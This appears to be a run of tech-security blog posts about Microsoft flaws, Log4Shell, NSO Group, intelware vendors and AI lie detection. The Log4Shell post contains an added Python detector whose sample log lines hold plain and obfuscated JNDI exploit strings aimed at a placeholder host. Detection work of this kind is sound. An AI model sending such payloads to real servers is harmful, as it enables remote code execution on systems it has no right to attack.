Microsoft Security? Just Super Duper
December 31, 2021
I installed software on one of my test machines. Windows’ Defender tool told me I had malware. Not true. To see what would happen, I clicked the offered Defender button and Windows killed a program from a developer doing business as Chris-PC. Helpful? You bet.
I mention this because I think I am the only person in Harrod’s Creek who believes that the Windows 11 release was a way to distract people from Microsoft’s security challenges. I like words like “challenges” and “misstep” because “dumpster fire” is too colorful and “disaster” has been overused.
What’s up with Microsoft security challenges as we creep toward what will be a banner year for some actors? How about these two news stories?
First, we have “Microsoft Teams Bug Allowing Phishing Unpatched Since March.” The main idea is that nine months have bustled by. Teams users could fall victim to some missteps in Microsoft Teams. The write up states:
German IT security consultancy firm Positive Security’s co-founder Fabian Bräunlein discovered four vulnerabilities leading to Server-Side Request Forgery (SSRF), URL preview spoofing, IP address leak (Android), and denial of service (DoS) dubbed Message of Death (Android). Bräunlein reported the four flaws to the Microsoft Security Response Center (MSRC), which investigates vulnerability reports concerning Microsoft products and services. “The vulnerabilities allow accessing internal Microsoft services, spoofing the link preview, and, for Android users, leaking their IP address and DoS’ing their Teams app/channels,” the researcher said. Out of the four vulnerabilities, Microsoft addressed only the one that attackers could use to gain access to targets’ IP addresses if they use Android devices.
Second, we have “Stealthy BLISTER Malware Slips in Unnoticed on Windows Systems.” I learned:
… Blister, acts as a loader for other malware and appears to be a novel threat that enjoys a low detection rate. The threat actor behind Blister has been relying on multiple techniques to keep their attacks under the radar, the use of code-signing certificates being only one of their tricks.
Nope, let’s block Windows 11 users from installing another browser. Let’s kill Chris-PC software. The path forward is to enter 2022 with the ghost of SolarWinds laughing and the ghosts of Christmas yet to come licking their lips in glee.
Stephen E Arnold, December 31, 2021
Log4Shell: Tough to Hide This Fire
December 28, 2021
Billy Joel was absolutely right when he sang the acclaimed song “We Didn’t Start The Fire” about the world’s slow demise. Unlike the planet, the Internet is regularly set ablaze and the demise is quick. The current flame is “Log4Shell” and it gives bad actors back doors into clouds and enterprise systems to steal data, download malware, erase information, and cause mayhem. AP News explores the breach in: “‘The Internet’s On Fire’ As Techs Race To Fix Software Flaw.”
The bug dubbed “Log4Shell” originated in open source Apache software used to run Web sites and other Web services. While open source software is a boon to the world, it is not updated as quickly as proprietary software. Amazon, for example, updates itself daily while systems running Apache only update at their owners’ behest.
Funnily enough, the “Log4Shell” vulnerability was first noticed in a children’s game:
“The first obvious signs of the flaw’s exploitation appeared in Minecraft, an online game hugely popular with kids and owned by Microsoft. Meyers and security expert Marcus Hutchins said Minecraft users were already using it to execute programs on the computers of other users by pasting a short message in a chat box. Microsoft said it had issued a software update for Minecraft users. ‘Customers who apply the fix are protected,’ it said.”
Cyber security is not child’s play, but hacking is for some bad actors. Thankfully developers are working on a patch to prevent further damage. Security professionals really should not panic; they should combine their knowledge to find a solution more quickly.
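The Minecraft chat-box attack above works because the logging library evaluates `${...}` lookups inside any logged string, and attackers split the word “jndi” across nested lookups to slip past naive string matching. The following is an added detection example (not code from the original post or from AP News): it collapses the common literal lookups before matching, so obfuscated and plain forms are caught alike. The log lines and the host `lookup.example` are constructed placeholders.

```python
import re
from typing import List, Optional, Tuple

# Constructed sample access-log lines (not from the original post). The host
# "lookup.example" is a placeholder, not a real indicator.
SAMPLE_LOG_LINES = [
    '10.0.0.5 - - "GET /index.html HTTP/1.1" 200 "Mozilla/5.0"',
    '10.0.0.7 - - "GET / HTTP/1.1" 200 "${jndi:ldap://lookup.example/a}"',
    '10.0.0.9 - - "GET / HTTP/1.1" 200 "${${lower:j}ndi:${lower:l}dap://lookup.example/a}"',
    '10.0.0.11 - - "GET / HTTP/1.1" 200 "${${::-j}${::-n}${::-d}${::-i}:rmi://lookup.example/b}"',
    '10.0.0.13 - - "GET / HTTP/1.1" 200 "${${env:NOPE:-j}ndi:dns://lookup.example/c}"',
    '10.0.0.15 - - "GET /?q=${date:yyyy} HTTP/1.1" 200 "curl/7.79"',
]

# Innermost ${...} lookups whose result is a plain literal. These forms let a
# payload spell "jndi" without ever containing the word:
#   ${lower:J} / ${upper:j}  -> case-converted literal
#   ${::-j}                  -> empty lookup with default value "j"
#   ${env:UNSET:-j}          -> named lookup whose default value is "j"
_LITERAL_LOOKUP = re.compile(
    r"\$\{(?:"
    r"(?P<case>lower|upper):(?P<case_val>[^${}]*)"
    r"|::-(?P<empty_dflt>[^${}]*)"
    r"|[A-Za-z]+:[^${}]*?:-(?P<named_dflt>[^${}]*)"
    r")\}"
)

# After normalisation the only thing left to spot is a JNDI lookup and its scheme.
_JNDI = re.compile(r"\$\{\s*jndi\s*:\s*([A-Za-z][A-Za-z0-9+.-]*)\s*:", re.IGNORECASE)


def _resolve(m: "re.Match[str]") -> str:
    """Evaluate one literal lookup to the string it would produce."""
    if m.group("case") is not None:
        val = m.group("case_val")
        return val.lower() if m.group("case") == "lower" else val.upper()
    if m.group("empty_dflt") is not None:
        return m.group("empty_dflt")
    return m.group("named_dflt")


def normalize_lookups(text: str, max_depth: int = 32) -> str:
    """Collapse nested literal lookups from the inside out so an obfuscated
    payload reads as its plain form. max_depth bounds the work on
    adversarial input with very deep nesting."""
    for _ in range(max_depth):
        collapsed = _LITERAL_LOOKUP.sub(_resolve, text)
        if collapsed == text:
            break
        text = collapsed
    return text


def find_jndi_lookup(line: str) -> Optional[str]:
    """Return the JNDI scheme (ldap, rmi, dns, ...) if the line carries a
    Log4Shell-style lookup after de-obfuscation, otherwise None."""
    m = _JNDI.search(normalize_lookups(line))
    return m.group(1).lower() if m else None


def scan_lines(lines: List[str]) -> List[Tuple[int, str, str]]:
    """Run the detector over a batch of log lines. Each hit is
    (line_number, scheme, normalized_line) for the analyst's ticket."""
    hits: List[Tuple[int, str, str]] = []
    for n, line in enumerate(lines, start=1):
        scheme = find_jndi_lookup(line)
        if scheme:
            hits.append((n, scheme, normalize_lookups(line)))
    return hits


if __name__ == "__main__":
    for n, scheme, shown in scan_lines(SAMPLE_LOG_LINES):
        print(f"line {n}: jndi/{scheme} -> {shown}")
```

Benign lookups such as `${date:yyyy}` are left alone, so the check keys on the JNDI lookup itself rather than on `${` alone.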
A couple of points:
- The issue allegedly was disclosed by an Alibaba tech professional, possibly Chen Zhaojun
- China suspended an apparently “big” cyber security deal with Alibaba after the disclosure
Are these two actions connected; specifically, did China lose control of a really nifty zero day? Beyond Search thinks that the career trajectory of some Alibaba professionals will be interesting to watch. Are there IT jobs in Ürümqi?
Whitney Grace, December 28, 2021
DarkCyber for December 28, 2021, Now Available
December 28, 2021
This is the 26th program in the third series of DarkCyber video news programs produced by Stephen E Arnold and Beyond Search. You can view the ad-free show at this url. This program includes news of changes to the DarkCyber video series. Starting in January 2022, Dark Cyber will focus on smart software and its impact on intelware and policeware. In addition, Dark Cyber will appear once each month and expand to a 15 to 20 minute format.
What will we do with the production time? We begin a new video series called “OSINT Radar.” OSINT is an acronym for open source intelligence. In a December 2021 presentation to cyber investigators, the idea surfaced of a 60 second profile of a high value OSINT site. We have developed this idea and will publish what we hope will be a weekly video “infodeck” in video form of an OSINT resource currently in use by law enforcement and intelligence professionals. Watch Beyond Search for the details of how to view these short, made-for-mobile video infodecks. Now when you swipe left, you will learn how to perform free reverse phone number look ups, obtain a list of a social media user’s friends, and other helpful data collection actions from completely open source data pools.
Also in this DarkCyber program are: [a] the blame for government agencies and specialized software vendors using Facebook to crank out false identities. Hint: It’s not the vendors’ fault. [b] why 2022 will be a banner year for bad actors. No, it’s not just passwords, insiders, and corner-cutting software developers. There is a bigger problem. [c] Microsoft has its very own Death Star. Does Microsoft know that the original Death Star was a fiction and that it did not survive an attack by the rebels? And [d] a smart drone with kinetic weapons causes the UN to have a meeting and decide to have another meeting.
Kenny Toth, December 28, 2021
Log Exploits, Pegasus Methods, and Willful Ignorance
December 21, 2021
Which of the “our hair is on fire” articles should I reference? There’s the “worst security issue ever” approach of the Security Now podcast. Google released an analysis of NSO Group’s Pegasus methods. There’s the happy discovery story and community-centric notification by an engineer working at a Chinese company. There’s Canada’s turning off quite a few essential government Web sites. And more. Lots more.
My take is that these post-SolarWinds missteps are going to come faster and more furiously with or without Microsoft’s magical 1,000 engineers beavering away in lovely Moscow.
Why?
Three reasons, and I know these will not be particularly popular among the thumbtypers, the funders of venture backed cyber security firms, and the open source community. Hey, life is tough.
1. Good Enough
In order to reduce costs and move faster, good enough is the key business practice to have emerged in the last decade. Systems are assembled via chunks of code, APIs, and scripts conjured from online sources. As a result, there are obviously some egregious issues. The SolarWinds’ misstep is one example. The hair on fire over Java is another. We had a ringside seat to the Kendara start up, which was sold to @Home (which may have been AT&T); Java was exciting indeed. Now Java is different? Sorry. It’s good enough. Why not do “better”? It takes effort, money, and time. Foosball and making designer coffee are more important for some.
2. Open Source and the Community
Yeah, the appeal of free software, no proprietary software license agreements, and the ability to make changes which — ha ha ha — coulda woulda shoulda been shared with the community are powerful rocket engines for open source applications. Now everything from Elasticsearch to the latest mobile device is like a clueless elderly person negotiating with a New York real estate wizard. You know who is going to win, right? The community is often a front for a commercial interest, a way for a developer to get a job, or a clever programmer to drive business to a consulting side gig. Who knows who will cobble together enough open source to solve one of the persistent problems with computing. The issue is that the “community” is not homogeneous and the fruit cake of code is neither subjected to testing for security issues nor reworked to make it just more wonderful. Without an incentive, open source is almost as juicy a bad actor opportunity as that wonderful Microsoft Exchange “solution.”
3. Kick the Can Down the Road
In my more than 50-year work career, the most frequent answer to a persistent problem has been to find something expedient to ameliorate it. Then kick the can down the road for subsequent managers, programmers, and summer interns to solve. Whether the issue is the security of home smart devices or hidden vulnerabilities of a $200,000 per year piece of smart software infused with Snorkel goodness, just focus on the short term. Those larger issues? Hey, what are those? Just walk away from the dead whales on the beach. Technology and tomorrows will solve the less visible, longer term problems.
Net Net
What’s the fix for the hair on fire crowd? Oh, upgrade to the more secure version. License a smart system like Antigena. Introduce a new cyber threat information service. See how easy it is to operate in a digital world in which the vast majority of people are thrilled with the computing status quo. Life will be more secure and even better in the metaverse too.
Stephen E Arnold, December 20, 2021
Google and Its Penchant for Bold Assertions
December 17, 2021
Google claimed quantum supremacy. Recently Google’s engineers studied the technology of the NSO Group and according to “A Deep Dive into an NSO Zero-Click iMessage Exploit: Remote Code Execution” found the “most technically sophisticated exploit ever seen.” The analysis is thorough and reflects considerable enthusiasm for disentangling some of the inner workings of Apple’s mobile operating system. I can almost hear the chuckles of the Google engineers as they figured out how the NSO Group compromised iPhones simply by sending the unlucky target a message packet.
Several observations:
- The NSO Group talks with other entities (people from universities, a military unit, colleagues at limited-attendance conferences, etc.). Consequently information about methods seeps into the intelware community. This community is not quite like the Yacht Club in Manhattan, but it is similar: Traditions, friendships, bonhomie, and the like.
- Intelware developers associated with other countries often gain access to specialized tools and services via connections with a nation state which is a customer of a specialized services firm, say, for argument’s sake, the NSO Group. It is probable that other entities have examined and replicated some of the NSO Group’s systems and methods. The fact that Google figured out the systems and methods of this particular NSO Group service means that other groups can too. (It is possible that some at Google believe that their work is singular and not replicable. Yeah, high school science club thinking, perhaps?)
- Due to the connection between high value targets and the cachet of the Apple iPhone, figuring out how to penetrate an iPhone is a high value activity. Apple’s engineers are bright and were in their high school science clubs as well. However, engineers do not design to prevent unforeseeable flaws in their engineering innovations. This means that iPhones have flaws. When a device is the focus of attention of numerous nation states’ intelligence services, commercial enterprises in the zero day business, and companies with staff trained by military intelligence organizations — flaws will be found. My Arnold Rule for this situation is that insights will be discovered of which the original developer had no clue.
Kudos to Google for the NSO Group information. However, the statements about the sophistication of the exploit are a bit like the claim for quantum supremacy. There are other entities in the intel world which have capabilities which will surprise the “experts” just now discovering the world of intelware. Nice paper, very academic, but it reveals a disconnect between the world of the commercial researcher and the robust, broad intelware ecosystem.
Stephen E Arnold, December 17, 2021
How Are Those Cyber Security Strategies Working, Java Fans?
December 16, 2021
As hackers’ methods evolve, so do efforts to thwart them. The SmartData Collective describes “3 Strategies Employed by the Leading Enterprise Cybersecurity Platforms.” We wonder whether the FBI implemented these methods. If so, we think the recent hack of that agency’s systems raises some questions. That case aside, writer Matt James reports:
“Stephanie Benoit-Kurtz, Lead Area Faculty Chair for the University of Phoenix’s Cybersecurity Programs, offers a good summary of the changes security organizations should anticipate, especially in the time of the pandemic. ‘The threat landscape over the past 18 months has significantly changed in complexity and frequency of attacks. Long gone are the days when a lone wolf attacker was manually knocking at the door.’ To get acquainted with the ways security firms are handling the new breed of threats in cyberspace, here’s a rundown of the notable strategies the leading cybersecurity platforms and security firms are offering.”
First up is breach and attack simulation, or BAS. As the name implies, this cybersecurity platform feature tests systems for potential weaknesses. Next we learn about continuous automated red teaming (CART). Red teaming is the labor-intensive practice of having a group of white-hat hackers test one’s system for vulnerabilities. It has gotten difficult for mere humans to keep up, though, so automating the process was the logical next step. Finally, there is advanced purple teaming. This color-blending method relies on collaboration between test-attackers (red) and defense teams (blue). This seems so obvious we wonder why it was not being done all along, but apparently departmental silos are resistant to common sense. See the write-up for details on each of these approaches. James concludes:
“Many of the world’s top cybersecurity platforms and security solution providers have already embraced breach and attack simulation, continuous automated red teaming, and advanced purple teaming. These strategies in securing organizations may be relatively new, but cybersecurity professionals can vouch for their effectiveness in view of the new kinds of problems presented by cunning malicious actors in cyberspace.”
This may be true, but these measures will only work if companies, and agencies, actually put them in place. Organizations that drag their feet on security are taking a real risk. Yep, open source Java tools. No problem, right?
Cynthia Murrell, December 16, 2021
Specialized Software Vendors: Should They Remember the Domino Theory?
December 15, 2021
Lining up dominoes, knocking one down, and watching the others in a line react to what some non-nuclear types call a chain reaction is YouTube fodder. One can watch geometric growth manifested in knocked down dominoes. Click here for the revelation. We may have some domino action in the specialized software and services market. This “specialized software and services” is my code word for developers of intelware and policeware.
“US Calls for Sanctions against NSO Group and Other Spyware Firms” reports:
a group of politicians (including Senate Finance Committee chair Ron Wyden, House Intelligence Committee chair Adam Schiff and 16 other Democrats) accuses NSO and three other foreign surveillance firms of helping authoritarian governments to commit human rights abuses.
And what firms are the intended focus of this hoped for action? According to the write up, the companies are:
- Amesys (now called Nexa Technologies). This was a company which found purchase in some interesting countries bordering the Mediterranean, garnered some attention, and morphed into today’s organization.
- DarkMatter (based in United Arab Emirates). This is an interesting outfit which has allegedly recruited in the US and possibly developed a super duper secure mobile device. The idea was to avoid surveillance. Right?
- Trovicor (based in Germany) once was allegedly a unit of Nokia Siemens Networks and is mentioned in a fiery write up called “Explosive Wikileaks Files Reveal Mass Interception of Entire Population.” That’s a grabber headline I suppose. True or false? I have zero idea but it illustrates the enthusiasm some evidence when realizing that interesting companies provide some unique services to their customers.
The reason for the hand waving is the publicity the NSO Group has inadvertently generated.
Will the knock on NSO Group have an impact on Amesys Nexa, DarkMatter, and Trovicor? Those YouTube videos may foreshadow what might happen if government officials look for the more interesting and more technologically advanced specialized software and services companies. Where can one find a list of such organizations? Perhaps the developer of the new OSINT service knows? Curious? Write darkcyber333 @ yandex dot com.
Stephen E Arnold, December 15, 2021
DarkCyber for December 14, 2021, Now Available
December 14, 2021
The December 14, 2021, Dark Cyber video news program is now available on the Beyond Search Web log and YouTube at this link.
Program number 25 for 2021 includes five stories.
The first is that a list of companies engaged in surveillance technology and specialized software for law enforcement and intelligence professionals is available without charge. The list is not comprehensive, but it is one of the first open source documents which identifies companies operating “off the radar” of many analysts, law enforcement professionals, private detectives, and would-be investigative journalists.
The second story adds another chapter to the chronicle of missteps by a company doing business as NSO Group. The Israel company develops and licenses specialized software to government agencies. However, the use of that software has become problematic. This edition of Dark Cyber reports about the alleged use of the Pegasus mobile phone data collection system to obtain information from US diplomats’ mobile devices. The consequences of MBA thinking have roiled the specialized services market worldwide.
The third story extracts pricing information made public by the Brennan Center. The documents obtained via a FOIA request to California were prepared by the Los Angeles Police Department. Although redacted, the documents contained what appears to be trade secret pricing information about the Voyager Labs’ surveillance data analytics system marketed worldwide. The Dark Cyber story reveals how to download the document collection and additional details about a very low profile company’s technology and methods.
The fourth story describes new digital cameras which are the size of a grain of salt. Dark Cyber then reveals that a small roll up drone has been developed. The form factor is similar to a seed which spins as it floats to the ground. Combining the miniature cameras with the seed-like form factor creates opportunities for a new approach to video surveillance.
The final story announces a new Dark Cyber service. The weekly Instagram post will provide specific information about Web sites now used by law enforcement, analysts, and intelligence professionals to gather data about persons of interest, their social media activities, their location, and other high-value facts. The new service goes live in January 2022.
Dark Cyber is produced by Stephen E Arnold, who publishes the Web log called Beyond Search and available at this link.
Kenny Toth, December 14, 2021
NSO Group: How about That Debt?
December 14, 2021
The NSO Group continues to make headlines and chisel worry lines in the faces of the many companies in Israel which create specialized software and systems for law enforcement and intelligence professionals. You can read the somewhat unpleasant news in Bloomberg’s report, the Financial Times’ article, and Gizmodo’s Silicon Valley-esque write up. Gizmodo said:
the company’s cumbersome mixture of unpaid debts and growing international scrutiny have made NSO a bloated pariah and is forcing its leadership to consider shutting down its Pegasus spyware unit. Selling the entire company is also reportedly on the table.
First, the reports suggest, without much back up, that NSO Group has about half a billion US dollars in debt. This is important because it underscores what is the number one flaw in the jazzy business plans of companies making sense of data and providing specialized services to law enforcement, intelligence, and war fighting entities. Here’s my take:
Point 1. What was secret is now open and easily available information.
Since Snowden, the systems and methods informing NSO Group and dozens of similar firms are easy to grasp. Former intelligence professionals can blend what Snowden revealed with whatever these individuals picked up in their service to their country, create a “baby” or “similar” solution and market it. This means that there are more surveillance, penetration, intercept, and analysis options available than at any other time in my 50 year career in online information and systems. Toss in what’s in the wild from dumps of FinFisher and Hacking Team techniques and the gold mine of open source code, and it should be no surprise that the NSO Group’s problem is just the tip of an iceberg, a favorite metaphor in the world of surveillance. None of the newsy reports grasp the magnitude of the NSO Group problem.
Point 2. There’s a lot of “smart” money chasing a big pay day from software purpose built for law enforcement, intelligence, and military operations. VC cows in herds, however, are not that smart or full of wisdom.
There are many investors who buy the line that “cyber crime and terrorism” drive big, lucrative sales of specialized software and systems. That’s partially correct. But what’s happened is that the flood of cash has generated a number of commercial enterprises trying to convert those dollars into highly reliable, easy to use systems. The presentations at off the radar trade shows promise functionality that is almost science fiction. The situation today is that there is a lot of hyper marketing going on because there’s money to apply some very expensive computational methods to what used to be largely secret and manual work. A good case for the travails of selling and keeping customers is the Palantir Technologies’ journey, which is more than a decade long and still underway. The marketing is seeping from conferences open only to government agencies and those with clearances to advertising trade shows. I think you can see the risk of moving from low profile or secret government solutions to services for Madison Avenue. I sure can.
Point 3. Too few customers to go around.
There are not enough government customers with deep pockets for the abundant specialized services and systems which are on offer. In this week’s DarkCyber at this link, you can learn about the vendors at conferences where surveillance and applied information collection and analysis firms explain their products and services. You can also learn that the Brennan Center has revealed documents obtained via FOIA about Voyager Labs, a company which is also engaged in the specialized software and services business. Our DarkCyber report makes clear that license fees are in six figures and include more special add ins than a deal from a vendor selling at the Clignancourt flea market. Competition means prices are falling, and quite effective systems are available for as little as a few hundred dollars per month and sometimes even less. Plus, commercial enterprises are often nervous when the potential customer realizes the power of specialized software and services. Stalking made easy? Yep. Spying on competitors facilitated? Yep. Open source intelligence makes it possible to perform specialized work at a quite attractive price point: Free or a few hundred a month.
What’s next?
Financial wizards may be able to swizzle the NSO Group’s financial pickles into a sweet relish for a ball park frank. There will be other companies in this sector which will face comparable money challenges in the future. From my perspective, it is not possible to put the spilled oil back in the tanker and clean the gunk off the birds now coated in crude.
Policeware and intelware vendors have operated out of sight and out of mind in their bubble since i2 Ltd. in the late 1990s rolled out the Analyst’s Notebook solution and launched the market for specialized software. The NSO Group’s situation could shove, or has already shoved, a hat pin in that big, fat balloon.
More significantly, formerly blind and indifferent news organizations, government agencies, and potential investors can see what issues specialized software and services pose. More reporting will be forthcoming, including books that purport to reveal how data aggregators are spying on hapless Instagram and TikTok users. Like most of the downstream consequences of the so called digital revolution, NSO Group’s troubles are the tip of an information iceberg drifting into equatorial waters.
Stephen E Arnold, December 14, 2021
AI-Powered Alternative to Polygraph Emerging out of Israel
December 6, 2021
Will AI eventually replace the polygraph in discerning truth from falsehood? The Times of Israel suggests we may be heading that direction in, “Liar, Liar! ‘Reading’ Faces, Israeli Tech Spots Fibbers with 73% Accuracy.” The emerging technology is the project of a team at Tel Aviv University. Writer Nathan Jeffay reports:
“Israeli scientists say they have found a way to ‘read’ minuscule movements in the face in order to spot fibbers, and have done so with 73 percent accuracy. With highly sensitive electrodes placed to detect the smallest of movements by facial muscles, the researchers got their subjects to either speak truthfully or lie. They fed details on the patterns of those facial movements into an artificial intelligence tool, and taught it to determine whether other people are lying or telling the truth. Now, they are aiming to teach the AI tool to analyze face movements without electrodes. Instead, they want to develop the tech to follow faces in order to determine truthfulness via cameras — which could enable them to spot a liar from dozens of meters away.”
A 73% accuracy rate would leave a lot of room for false accusations. It is considerably lower than the estimated 87% accuracy rate of polygraph tests (a figure that is itself contested). Researchers promise, however, that accuracy will improve as development continues. The approach, we’re told, has a significant advantage over polygraphs, which some subjects can fool by regulating their heart rate, blood pressure, and breathing. Regarding the examination of facial muscles instead, researcher Kino Levy states:
“We knew before now that facial expressions that are manifested by contractions in face muscles represent various emotions. … But up until now when people tried to identify these small movements in face muscles, we can’t do—our brains and our perception aren’t fast or sophisticated enough to pick up these tiny movements in the face. Many studies have shown that it’s almost impossible for us to tell when someone is lying to us. Even experts, such as police interrogators, do only a little better than the rest of us.”
This specially tailored AI, however, can accurately interpret these movements; 73% of the time, anyway. Levy insists his team’s technology will be a game changer. Once they have been able to improve accuracy, of course.
And here’s a question for Israeli companies with specialized software, “Are your systems used to hack American elected officials?”
Cynthia Murrell, December 6, 2021